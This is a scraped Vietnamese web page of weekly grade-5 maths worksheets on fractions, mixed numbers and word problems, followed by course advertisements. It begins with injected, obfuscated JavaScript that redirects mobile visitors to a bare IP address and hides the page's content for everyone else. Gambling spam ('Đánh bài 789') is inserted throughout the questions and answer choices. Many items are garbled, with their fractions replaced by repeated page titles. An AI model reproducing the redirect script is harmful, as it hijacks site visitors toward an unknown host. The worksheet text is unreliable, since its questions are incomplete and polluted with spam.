function goPAGE() { if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://180.215.56.197/" } else { var ss = '
'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if (myid != "iconDiv1" && myid != "yangchen") { document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {} } } goPAGE();

Top 52 Bài tập, Đề kiểm tra cuối tuần Toán lớp 5 Học kì 1 có đáp ánDưới đây là tuyển tập Top 52 Bài tập cuối tuần Toán lớp 5 học kì 1 với các Đề kiểm tra cuối tuần cơ bản, nâng cao có đáp án và thang điểm chi tiết cực hay giúp bạn học tốt môn Toán 5.

Tải xuống

Mục lục Bài tập cuối tuần Toán 5 Học kì 1

Quảng cáo

Tuần 1

Tuần 2

Tuần 3

Tuần 4

Quảng cáo

Tuần 5

Tuần 6

Tuần 7

Tuần 8

Tuần 9

Quảng cáo

Tuần 10

Tuần 11

Tuần 12

Tuần 13

Tuần 14

Tuần 15

Quảng cáo

Tuần 16

Tuần 17

Tuần 18

Bài tập cuối tuần Toán lớp 5 - Tuần 1

Thời gian: 45 phút

Phần I. Trắc nghiệm (6 điểm)

Hãy khoanh tròn vào chữ cái đặt trước câu trả lời đúng :

Câu 1: (1 điểm) Phân số bằng Bài tập cuối tuần Toán lớp 5 Tuần 1 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án là?

Bài tập cuối tuần Toán lớp 5 Tuần 1 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Câu 2: (1 điểm) Trong các phân số Bài tập cuối tuần Toán lớp 5 Tuần 1 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án các phân số bằng nhau là?

Bài tập cuối tuần Toán lớp 5 Tuần 1 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Câu 3: (1 điểm)Đánh bài 789 Mọi số tự nhiên có thể viết thành phân số có mẫu số là :

 A. 0

 B. 1

Đánh bài 789 C. 2

 D. 3

Câu 4: (1 điểm)Đánh bài 789 Phân số có tử số lớn hơn mẫu số là phân số :

 A. Bé hơn 1

 B. Bằng 1

 C. Lớn hơn 1

 D. Bằng 0

Câu 5: (1 điểm) Dấu thích hợp viết vào chỗ chấm Bài tập cuối tuần Toán lớp 5 Tuần 1 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp ánđược xếp theo thứ tự từ lớn đến bé là:

A. <

B. >

C. =

Câu 6: (1 điểm) Các phân số Bài tập cuối tuần Toán lớp 5 Tuần 1 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp ánĐánh bài 789 được xếp theo thứ tự từ lớn đến bé là:

Bài tập cuối tuần Toán lớp 5 Tuần 1 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Phần II. Tự luận (4 điểm)

Câu 1: (2 điểm) a. So sánh các phân số Bài tập cuối tuần Toán lớp 5 Tuần 1 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

b.Nêu cách so sánh hai phân số có cùng tử số

.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

Câu 2: (2 điểm) Hai vòi nước cùng chảy vào một bể nước . Vòi thứ nhất một giờ chảy được Bài tập cuối tuần Toán lớp 5 Tuần 1 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án bề , vòi thứ hai một giờ chảy được Bài tập cuối tuần Toán lớp 5 Tuần 1 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án bể . Hỏi vòi nào chảy nhanh hơn ?

.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

Bài tập cuối tuần Toán lớp 5 - Tuần 2

Thời gian: 45 phút

Phần I. Trắc nghiệm (6 điểm)

Hãy khoanh tròn vào chữ cái đặt trước câu trả lời đúng :

Câu 1: (1 điểm) Hỗn số Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án đọc là:

Đánh bài 789 A. Hai hai mốt phần hai ba

Đánh bài 789 B. Hai hai mươi mốt phần hai mươiba

 C. Hai và hai mươi mốt phần hai ba

 D. Hai và hai mươi mốt phần hai mươi ba

Câu 2: (1 điểm) Phân số Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án là phân số :

A.Bé hơn 1

 B. Lớn hơn 1

 C. Bằng 1

Câu 3: (1 điểm) Các giá trị số tự nhiên khác 0 thích hợp của x để có: Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

 A. 1 ;2

 B. 0 ; 1; 2

Đánh bài 789 C. 1; 2; 3

Đánh bài 789 D. 0;1 ; 2; 3

Câu 4: (1 điểm) Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án được tính như sau:

Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Câu 5: (1 điểm) Một lớp học có 40 học sinh trong đó Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án là học sinh giỏi toán Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án số học sinh là học sinh giỏi tiếng việt . Số học sinh giỏi toán của lớp học đó là :

 A. 12 học sinh

Đánh bài 789 B. 8 học sinh

 C. 20 học sinh

Đánh bài 789 C. 10 học sinh

Câu 6: (1 điểm) Phân số Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp ánĐánh bài 789 được viết dưới dạng phân số thập phân là :

Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Phần II. Tự luận (4 điểm)

Câu 1: (2 điểm) Tính:

Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Đánh bài 789.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

Câu 2: (2 điểm)Một tấm bìa hình chữ nhật có chiều dài Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp ánm chiều rộng Bài tập cuối tuần Toán lớp 5 Tuần 2 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp ánm . Chia tấm bìa đó thành hai phần bằng nhau . Tính diện tích mỗi phần ?

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

Bài tập cuối tuần Toán lớp 5 - Tuần 3

Thời gian: 45 phút

Phần I. Trắc nghiệm (6 điểm)

Hãy khoanh tròn vào chữ cái đặt trước câu trả lời đúng :

Câu 1: (1 điểm) Dấu thích hợp điền vào chỗ chấm để so sánh Bài tập cuối tuần Toán lớp 5 Tuần 3 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án là :

A <

 B. >

Đánh bài 789 C. =

Câu 2: (1 điểm) Hỗn số 5Bài tập cuối tuần Toán lớp 5 Tuần 3 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án chuyển thành phân số là :

Bài tập cuối tuần Toán lớp 5 Tuần 3 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Câu 3: (1 điểm) Phân số thích hợp để viết vào chỗ chấm 7dm =....m là

Bài tập cuối tuần Toán lớp 5 Tuần 3 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Câu 4: (1 điểm)Đánh bài 789 Tổng số tuổi hai mẹ con là 48 tuổi .Tuổi mẹ gấp 3 lần tuổi con . Tuổi mẹ là :

 A. 24 tuổi

 B. 30 tuổi

 C. 36 tuổi

 D. 38 tuổi

Câu 5: (1 điểm) Bài tập cuối tuần Toán lớp 5 Tuần 3 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án Kết quả của phép chia là:

Bài tập cuối tuần Toán lớp 5 Tuần 3 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Câu 6: (1 điểm) Bài tập cuối tuần Toán lớp 5 Tuần 3 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp ánĐánh bài 789 số học sinh của một trường Tiểu học là 420 học sinh . Hỏi Trường Tiểu học đó có bao nhiêu học sinh.

Đánh bài 789 A. 588 học sinh

 B. 300 học sinh

 C. 175 học sinh

 D. 245 học sinh

Phần II. Tự luận (4 điểm)

Câu 1: (2 điểm) Tính

Bài tập cuối tuần Toán lớp 5 Tuần 3 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Bài tập cuối tuần Toán lớp 5 Tuần 3 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Bài tập cuối tuần Toán lớp 5 Tuần 3 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Bài tập cuối tuần Toán lớp 5 Tuần 3 có đáp án (Đề 3) | Đề kiểm tra cuối tuần Toán 5 có đáp án

Câu 2: (2 điểm) Mẹ hơn con 26 tuổi. Trước đây 2 năm tuổi mẹ gấp 3 lần tuổi con. Tính tuổi mỗi người hiện nay?

Đánh bài 789.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

.......................................................................................................................................................

Đánh bài 789.......................................................................................................................................................

.......................................................................................................................................................

Tải xuống

Xem thêm các Đề kiểm tra, Đề thi Toán lớp 5 có đáp án hay khác:

Mục lục Đề kiểm tra Toán lớp 5 có đáp án:

KHÓA HỌC GIÚP TEEN 2009 ĐẠT 9-10 LỚP 5

Phụ huynh đăng ký khóa học lớp 5 cho con sẽ được tặng miễn phí khóa ôn thi học kì. Cha mẹ hãy đăng ký học thử cho con và được tư vấn miễn phí tại khoahoc.poclink.com

Tổng đài hỗ trợ đăng ký khóa học: 084 283 45 85

4.5 (243)

799,000đs

599,000 VNĐ

4.5 (243)

799,000đ

599,000 Đánh bài 789VNĐ

4.5 (243)

799,000đ

599,000 VNĐ

Đã có app VietJack trên điện thoại, giải bài tập SGK, SBT Soạn văn, Văn mẫu, Thi online, Bài giảng....miễn phí. Tải ngay ứng dụng trên Android và iOS.

Theo dõi chúng tôi miễn phí trên mạng xã hội facebook và youtube:

Loạt bài Đề kiểm tra Toán 5 có đáp án của chúng tôi được biên soạn bám sát nội dung chương trình sgk Toán 5 Tập 1 và Tập 2.

Nếu thấy hay, hãy động viên và chia sẻ nhé! Các bình luận không phù hợp với nội quy bình luận trang webĐánh bài 789 sẽ bị cấm bình luận vĩnh viễn.